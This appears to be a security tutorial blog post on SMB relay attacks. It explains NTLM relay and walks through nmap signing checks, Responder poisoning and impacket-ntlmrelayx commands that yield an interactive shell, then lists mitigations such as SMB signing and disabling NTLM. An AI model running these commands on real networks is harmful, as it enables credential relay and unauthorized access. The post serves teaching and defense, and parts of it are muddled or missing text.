SMB Relay, What is it?

SMB Relay is a type of attack that exploits vulnerabilities in the Server Message Block (SMB) protocol, typically used in Windows environments for file sharing and other network services. In an SMB Relay attack, the attacker intercepts communication between a client and server and relays the captured authentication request to a legitimate server on behalf of the victim.

Attack Requirements:

• A vulnerable server: The server needs to accept NTLM authentication without mutual authentication, making it susceptible to relay attacks.
• Network access: The attacker needs access to the same network as the victim to intercept and relay the authentication.

How SMB Relay Attack Works:

1. Interception: The attacker positions themselves between the client and the server, usually using techniques like ARP poisoning or Man-in-the-Middle (MitM) attacks.
2. Capture of Credentials: When the victim client attempts to authenticate with a legitimate server using SMB, the attacker intercepts the authentication request. The authentication process typically uses NTLM (NT LAN Manager) or Kerberos credentials, which may include hashed passwords.
3. Relay: Instead of cracking the credentials, the attacker relays the authentication information to a different server that trusts the victim’s credentials.
4. Gain Access: If the target server accepts the relayed credentials, the attacker can gain access to network resources, often with the same privileges as the victim.

SMB Relay Example Attack flow:

Let’s walk through a practical example of an SMB Relay attack to demonstrate how an attacker can leverage intercepted credentials to gain unauthorized access to a target system. This hands-on example will show the critical importance of securing authentication mechanisms in network environments to prevent such vulnerabilities.

1. Assessing Target Vulnerability with Nmap

To initiate the process, it is crucial to first assess the target for potential vulnerabilities. Using Nmap, you can execute a script that evaluates the LLMNR, NBT-NS, and SMB protocols for weaknesses.

Run the following Nmap command against the target:

nmap --script=smb2-security-mode.nse -p445 <target-ip>

Output:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 13:07 EDT
Nmap scan report for <target-ip>
Host is up (0.090s latency).
PORT     STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|     I_ Message signing enabled but not required
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds

2. Setting Up Responder to Intercept SMB Traffic

Similar to LLMNR Poisoning the next step is to configure Responder, a popular tool for exploiting vulnerabilities in LLMNR, NBT-NS, and SMB protocols, to listen for and capture NTLM hashes.

On the attacker’s machine, run the following command:

sudo responder -I tun0 -dwPv

• -I tun0: Specifies the network interface to listen on.
• -dwPv: Enables DNS, SMB, and HTTP poisoning.

Responder will now wait for any broadcasted LLMNR or NBT-NS requests, which are often sent when a victim mistypes a shared folder name or attempts to connect to a non-existent resource.

3. Interception of the Authentication Request

Now, suppose a victim on the network tries to access a share that doesn’t exist, such as \\nonexistent-share or mistypes the shared folder name. Their machine will send out an LLMNR or NBT-NS request asking if anyone on the network knows how to connect to this share.

Responder, in its MitM position, will reply and tell the victim’s machine that it knows how to connect. The victim will then attempt to authenticate, sending their NTLM hash to the attacker’s machine, which looks like this:

3. Launching an SMB Relay Attack

Once Responder captures the NTLM hash, the attacker can relay that hash to a vulnerable server (one that has SMB signing enabled but not required). Tools like ntlmrelayx from the Impacket suite can be used to automate this relay attack.

sudo impacket-ntlmrelayx -tf target.txt -smb2support -i

• -tf target.txt: Specifies the file containing a list of target IPs or hostnames that are vulnerable to SMB Relay attacks.
• -smb2support: Enables SMB2 support, which makes the attack more effective against modern systems.
• -i: Provides an interactive shell if the relay is successful, allowing the attacker to execute commands on the target system.

Now as soon as the user mistypes or tries to connect to a share that doesn’t exist, the  ntlm hashes are captured by responder and sent to ntlmrelayx which automatically relays them to the vulnerable server listed in target.txt. If the server accepts the relayed credentials, the attacker gains access to the target system, potentially with administrative privileges.

We can see that the attack was successful and we have opened up a shell on 127.0.0.1:11000 , So let’s bind to it using netcat.

From here, we can exploit quite a bit of access.

Mitigation Strategies for SMB Relay Attacks

Implement SMB Signing on All Devices

SMB signing checks that all SMB packets are digitally signed. Thus, the traffic is regarded as authentic and undamaged. It is going to be hard for an attacker to manipulate or forward such traffic, like forwarding it through the relay server, without detection.

• Pro: Totally stops the attack since the unauthenticated clients will not have access to the server. Even if the attacker manages to catch the credentials, she can’t relay back to the server because there are no valid signatures.
• Con: Using SMB signing will introduce performance overhead in transferring files or accessing many resources in the network. This could delay the response time the application takes in responding to users and increase the load on other devices in the network.

Disable NTLM Authentication on the Network

Disabling NTLM Forcing clients and servers to us more secure authentication like Kerberos which is not vulnerable to SMB relay attack.

• Pro: Stomps the attack entirely since NTLM is no longer in use, so much as an attack surface reduced significantly since it relies upon intercepting NTLM authentication requests through the SMB.
• Con: Windows, in the case of failure of Kerberos authentication due to any cause, such as for example, time synchronization issues or service outages, falls back on NTLM, which may expose the network to compromise; therefore, this has to be perfectly ensured through proper configuration and monitoring so that it does not fall into fallback scenarios.

Implement Account Tiering

In account-tiering, user accounts are classified and categorized along with the grouping in an organization on their privileges, and it also limits administrative access to certain users who need them for performing some specific task. The likelihood of high-privilege accounts is reduced to be compromised.

• Pro: It limits the activities of domain admins to specific tasks, so it reduces an attack surface. For example, administrative accounts may only be allowed to log onto servers that require domain admin access, cutting off the opportunity for lateral movement within the network as well.
• Con: It would also present a challenge in enforcement as the strict requirement also presents a great potential change in managing their user accounts. There may be resistance from users who have used the widespread access.

Apply Local Admin Restrictions

Local Admin Restrictions This restricts the capability of users having administrative privileges over their local machines. This will prevent unauthorized installation of software on their machines and, therefore, will have a lower probability of lateral movement during attacks.

• Pro: Lateral movement in the network will be significantly prevented. Users won’t easily obtain administrative privileges on machines they don’t need for their day-to-day work. That keeps the breach scope at a small scale.
• Con: Increase service desk tickets, since, hopefully, there should be a potential need for support tasks users cannot perform due to privileges being limited. It also may frustrate users who require access elevated for them to work.

Monitor Network Traffic for Anomalies

Continuous monitoring for network traffic anomalies or possible unauthorized accesses would help in the early detection of unusual patterns in activity.This would quickly escalate to fast detection and response to possible attacks.

• Pro: This way SMB relay attack detection at an early stage prevents or minimizes damage when a breach is underway. It could raise alerts for peculiar logins, suspicious authentication requests, or peaks in the number of SMB traffic for investigation.
• Con: Tends to waste resources, either in monitoring tools or something else. It may even generate false positives that we need to address. Alerts may come in requiring proper handling on incident response processes.